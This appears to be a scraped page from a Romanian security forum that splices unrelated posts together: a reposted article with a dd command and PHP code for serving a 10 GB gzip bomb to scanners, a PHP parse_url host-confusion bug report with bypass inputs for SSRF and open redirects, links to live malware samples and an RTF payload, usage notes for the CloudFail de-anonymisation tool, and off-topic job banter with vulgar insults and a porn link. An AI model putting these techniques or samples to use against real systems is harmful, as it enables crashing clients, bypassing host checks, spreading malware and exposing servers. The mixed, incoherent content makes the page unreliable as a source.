Leaderboard

How to defend your website with ZIP bombs the good old methods still work today Posted by Christian Haschek on 2017-07-05 [update] I'm on some list now that I have written an article about some kind of "bomb", ain't I? If you have ever hosted a website or even administrated a server you'll be very well aware of bad people trying bad things with your stuff. When I first hosted my own little linux box with SSH access at age 13 I read through the logs daily and report the IPs (mostly from China and Russia) who tried to connect to my sweet little box (which was actually an old ThinkPad T21 with a broken display running under my bed) to their ISPs. Actually if you have a linux server with SSH exposed you can see how many connection attempts are made every day: grep 'authentication failures' /var/log/auth.log Hundreds of failed login attempts even though this server has disabled password authentication and runs on a non-standard port Wordpress has doomed us all Ok to be honest, web vulnerability scanners have existed before Wordpress but since WP is so widely deployed most web vuln scanners include scans for some misconfigured wp-admin folders or unpatched plugins. So if a small, new hacking group wants to gain some hot cred they'll download one of these scanner things and start testing against many websites in hopes of gaining access to a site and defacing it. Sample of a log file during a scan using the tool Nikto This is why all server or website admins have to deal with gigabytes of logs full with scanning attempts. So I was wondering.. Is there a way to strike back? After going through some potential implementations with IDS or Fail2ban I remembered the old ZIP bombs from the old days. WTH is a ZIP bomb? So it turns out ZIP compression is really good with repetitive data so if you have a really huge text file which consists of repetitive data like all zeroes, it will compress it really good. Like REALLY good. As 42.zip shows us it can compress a 4.5 peta byte (4.500.000 giga bytes) file down to 42 kilo bytes. When you try to actually look at the content (extract or decompress it) then you'll most likely run out of disk space or RAM. How can I ZIP bomb a vuln scanner? Sadly, web browsers don't understand ZIP, but they do understand GZIP. So firstly we'll have to create the 10 giga byte GZIP file filled with zeroes. We could make multiple compressions but let's keep it simple for now. dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip Creating the bomb and checking its size As you can see it's 10 MB large. We could do better but good enough for now. Now that we have created this thing, let's set up a PHP script that will deliver it to a client. <?php //prepare the client to recieve GZIP data. This will not be suspicious //since most web servers use GZIP by default header("Content-Encoding: gzip"); header("Content-Length: ".filesize('10G.gzip')); //Turn off output buffering if (ob_get_level()) ob_end_clean(); //send the gzipped file to the client readfile('10G.gzip'); That's it! So we could use this as a simple defense like this: <?php $agent = lower($_SERVER['HTTP_USER_AGENT']); //check for nikto, sql map or "bad" subfolders which only exist on wordpress if (strpos($agent, 'nikto') !== false || strpos($agent, 'sqlmap') !== false || startswith($url,'wp-') || startswith($url,'wordpress') || startswith($url,'wp/')) { sendBomb(); exit(); } function sendBomb(){ //prepare the client to recieve GZIP data. This will not be suspicious //since most web servers use GZIP by default header("Content-Encoding: gzip"); header("Content-Length: ".filesize('10G.gzip')); //Turn off output buffering if (ob_get_level()) ob_end_clean(); //send the gzipped file to the client readfile('10G.gzip'); } function startsWith($haystack,$needle){ return (substr($haystack,0,strlen($needle)) === $needle); } This script obviously is not - as we say in Austria - the yellow of the egg, but it can defend from script kiddies I mentioned earlier who have no idea that all these tools have parameters to change the user agent. Sooo. What happens when the script is called? Client Result IE 11 Memory rises, IE crashes Chrome Memory rises, error shown Edge Memory rises, then dripps and loads forever Nikto Seems to scan fine but no output is reported SQLmap High memory usage until crash (if you have tested it with other devices/browsers/scripts, please let me know and I'll add it here) Reaction of the script called in Chrome If you're a risk taker: Try it yourself Sursa: https://blog.haschek.at/post/f2fda

@Che :>

Description: ------------ url like these - http://example.com:80#@google.com/ - http://example.com:80?@google.com/ parse_url return wrong host. https://tools.ietf.org/html/rfc3986#section-3.2 The authority component is preceded by a double slash ("//") and is terminated by the next slash ("/"), question mark ("?"), or number sign ("#") character, or by the end of the URI. This problem has been fixed in 7.1. https://github.com/php/php-src/pull/1607 But, this issue should be recognized as security issue. example: - bypass authentication protocol (verify hostname of callback url by parse_url) - open redirector (verify hostname by parse_url) - server-side request forgery (verify hostname by parse_url and get_content) Test script: --------------- php > echo parse_url("http://example.com:80#@google.com/")["host"]; google.com php > echo parse_url("http://example.com:80?@google.com/")["host"]; google.com php > echo file_get_contents("http://example.com:80#@google.com"); ... contents of example.com ... Expected result: ---------------- parse_url("http://example.com:80#@google.com/")["host"]; example.com or parse error. Sursa: https://cxsecurity.com/issue/WLB-2017070054

da dar sa zici ca mai bine iei 17.000 mii de nobi decat 1000 de oameni cu experienta este putin depasita afirmatia ta eu am in echipa juniori si am vazut diferenta dintr un senior si un junior exemplu pe care l-am mai scris aici este un newsletter simplu care pentru un junior i-a luat 5 zile iar unui senior 6 ore ( cel senior a folosit cateva tool-uri open source ) just saying sunt avantaje si dezavataje ...

samples - zip pass: virus: https://yadi.sk/d/QT0l_AYg3KXCqc https://yadi.sk/d/S0-ZhPY53KWc84 https://yadi.sk/d/Zpkm88sp3KWc8v https://yadi.sk/d/WemMDKVy3KXPcy svchost.exe: https://yadi.sk/d/TsNv7OGW3KXvmS 027cc450ef5f8c5f653329641ec1fed9.exe in pseudocode: https://transfer.sh/m9JMB/027cc450ef5f8c5f653329641ec1fed9.txt RTF payload: https://transfer.sh/mCshn/data.txt SOURCE: https://gist.github.com/vulnersCom/65fe44d27d29d7a5de4c176baba45759

Super, thanks!

Da o fuga pana la Iasi http://www.umfiasi.ro/ScoalaDoctorala/TezeDoctorat/Teze Doctorat/Rezumat teza doctorat Alexandru Nemtoi.pdf De obicei lucrarile de doctorat se depun si la biblioteca. http://dental.pacific.edu/Documents/profresources/Medically_Complex.pdf - aici ai etc-ul. http://eprints.ugd.edu.mk/9426/1/1. teza de doctorat - Kiro Papakoca.pdf - pe langa subiect Baga in google "inurl:pdf". Spor

Cam asa a incercat si el cu postul meu fara sa ajunga la o concluzie. @Robert1995 cuvintele importante sunt "cerere", "oferta" si "piata fortei de munca". In mare parte in topic se vorbeste despre firmele care doresc angajati cu experienta si se plang intruna ca nu gasesc. Asta ii cererea. Oferta ii plina de tineri fara experinta si dornici de munca, nu ca unii dinozauri plictisiti care asteapta sa se termine ziua de lucru. Vorbim la modul general pentru ca sigur exista si exceptii de la aceste tipare. Un tanar va fi mult mai usor de integrat si modelat intr-o firma/structura organizatorica/regim de lucru. Bineinteles ca ii doare in cot de avantajele unui noob, dar si cand au o ciurda de dinozauri care se incoarda unu la altul sa vada care ii mai smecher pot sa spuna adio la teamwork si cooperare. Si asa te trezesti cu oamenii care nu se pot integra si creaza mai mult rau cu atitudinea lor decat toate liniile de cod pe care le scriu. Lucrurile astea cu relatiile intre angajati intra sub jurisdictia departamentului de HR unde ii plin de pizde cu mofturi si figuri care habar nu au ce se intampla in firma. Cand vine vorba de bani fie ca ii esti dinozaur sau noob o firma tot timpul va incerca sa te ingroape in munca pana la gat sau sa iti dea un salar mic, asta daca nu esti un pupincurst care profita de munca altora (a treia categorie si cea mai periculoasa). In concluzie, fiecare categorie are avantaje si dezavantaje. P.S. Mai sunt si alte caracteristici ale grupurilor enumerate doar ca nu am chef sa imi largesc cunostintele in HR pentru un amarat de topic legat de salarii. P.S.S. Unii dinozuari mai si formeaza haite in lupta lor acerba spre suprematie. Vai ce m-as distra intr-un departament de HR. Play time with real people and fellings.

https://www.sendspace.com/file/3v4ois Xylitol dynamic analysis: https://www.youtube.com/watch?v=VI9avdsmIwY

Mari, Foarte Mari!!

CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by CloudFlare in the hopes of discovering the location of the server. Using Tor to mask all requests, the tool as of right now has 3 different attack phases. Misconfigured DNS scan using DNSDumpster.com. Scan the Crimeflare.com database. Bruteforce scan over 2500 subdomains. Please feel free to contribute to this project. If you have an idea or improvement issue a pull request! Disclaimer This tool is a PoC (Proof of Concept) and does not guarantee results. It is possible to setup CloudFlare properly so that the IP is never released or logged anywhere; this is not often the case and hence why this tool exists. This tool is only for academic purposes and testing under controlled environments. Do not use without obtaining proper authorization from the network owner of the network under testing. The author bears no responsibility for any misuse of the tool. Usage To run a scan against a target: python cloudfail.py --target seo.com To run a scan against a target using Tor: service tor start (or if you are using Windows or Mac install vidalia or just run the Tor browser) python cloudfail.py --target seo.com --tor Dependencies Python3 argparse colorama socket binascii datetime requests Download:https://github.com/m0rtem/CloudFail

Have you tried here https://gloryholefoundation.com ?

thank's